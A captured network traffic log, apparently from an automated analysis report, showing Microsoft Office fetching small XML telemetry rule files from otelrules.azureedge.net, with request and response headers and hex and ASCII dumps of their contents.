                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 41a7f78c-b01e-0097-2b78-354f33000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142524Z-r178fb8d7656shmjhC1DFWu5kw00000002mg00000000euhr
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        25192.168.2.54973513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:24 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 428
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142524Z-16547b76f7fr4g8xhC1DFW9cqc0000000k00000000006xmq
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        26192.168.2.54973413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:24 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 1e45a1cf-401e-0029-3ef1-2c9b43000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142524Z-16547b76f7fj5p7mhC1DFWf8w40000000kv000000000d5hz
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        27192.168.2.54973713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:24 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142524Z-16547b76f7f76p6chC1DFWctqw0000000kx0000000008htd
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        28192.168.2.54973613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:24 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142524Z-16547b76f7f4k79zhC1DFWu9y00000000krg00000000k0d8
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        29192.168.2.54973813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:25 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142525Z-16547b76f7fknvdnhC1DFWxnys0000000ksg00000000ezrx
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        30192.168.2.54973913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:24 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:25 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 2e90e071-a01e-0098-64a3-348556000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142525Z-1749fc9bdbdgs9sshC1DFWt6ws00000002ug000000003rd0
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        31192.168.2.54974013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:25 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142525Z-16547b76f7f67wxlhC1DFWah9w0000000kn000000000nghe
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        32192.168.2.54974113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:25 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 420
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 7cdefebb-b01e-0070-2ca7-341cc0000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142525Z-r178fb8d765w8fzdhC1DFW8ep400000002ng0000000073xv
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
